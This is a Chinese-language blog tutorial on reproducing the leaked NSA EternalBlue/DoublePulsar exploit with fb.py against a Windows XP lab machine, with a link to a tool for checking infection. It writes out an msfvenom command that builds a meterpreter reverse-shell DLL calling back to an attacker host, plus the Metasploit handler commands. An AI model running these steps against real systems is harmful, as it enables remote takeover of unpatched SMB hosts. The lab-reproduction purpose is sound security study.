您的位置：首页 > 其它

ShadowBroker释放的NSA工具部分（windows）fb.py复现和中招检查方法

2017-07-08 18:20 786 查看

工具下载

1、Python2.6和pywin32安装包(注意都是32位的，不然会导致调用dll payload文件失败)：复现python和pywin32安装包（分流下载：http://pan.baidu.com/s/1jHKw0AU 密码：kuij）2、Shadowbroker放出的NSA***工具https://github.com/misterch0c/shadowbroker3、中招检查工具中招检查工具（分流下载：http://pan.baidu.com/s/1dETugox 密码：una3）注：检查工具已重写了（各有所需，你可以根据自己需要修改）

一、漏洞复现

1. 前期准备

***系统信息列表如下：


IP	系统信息	用途	备注
192.168.0.102	Windows 7旗舰版	***机器	需安装python2.6.6&pywin32
192.168.0.104	Kali linux 2	用于生成***payload(反弹shell等)和控制反弹的shell会话	生成reverse shell 的dll
192.168.0.103	Windows xp p3	靶机	开启SMB服务，445端口(默认开启,默认防火墙已经过滤该类***，建议关闭系统防火墙后测试）

在***机器中安装好python 2.6.6和pywin32,并设置好python的环境变量，以便我们在cmd中使用。

然后生成用于反弹shell的dll payload：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=8089 -f dll > reverser_tcp.dll

在靶机上开启SMB服务（默认开启），查看服务是否生效，即看靶机上的445端口是否在监听（netstat -ano）：

2. 工具使用

在win 7***机器上cmd中切换到windows目录输入:python fb.py

创建***项目日志目录文件夹log_dirs并设置针对***目标192.168.0.103的***日志目录然后输入：user eternalblue一路回车直到需要选择对应的***系统，如下图：

选择1使用常规部署方式（也就是在靶机上建立后门的部署方式,带有模糊测试）然后一路回车到确认***目标信息。接着使用use doublepulsar，然后一直回车直到如下图需要选择***的服务类型：

备注：作者截图错误，图中的192.168.0.105应为192.168.0.103我们***的服务类型是SMB，所以输入0，但是如果下次***的远程登陆，即RDP的时候输入1然后选择***系统的版本：

这里我们输入与靶机对应的系统版本，输入1.然后，需要选择想执行的动作：

这里我们输入2，执行由kali linux 2 msf生成的反弹shell的dll后门（放在C盘根目录）：

回到win 7 ***机器上设置好对应的反弹shell 的dll文件（payload）路径。

然后在Kali linux 2上运行msfconsole: # msfconsolemsf > use exploit/multi/handlermsf > set LHOST 168.0.104msf > set LPORT 8089msf > set PAYLOAD windows/meterpreter/reverse_tcpmsf > exploit效果如下图：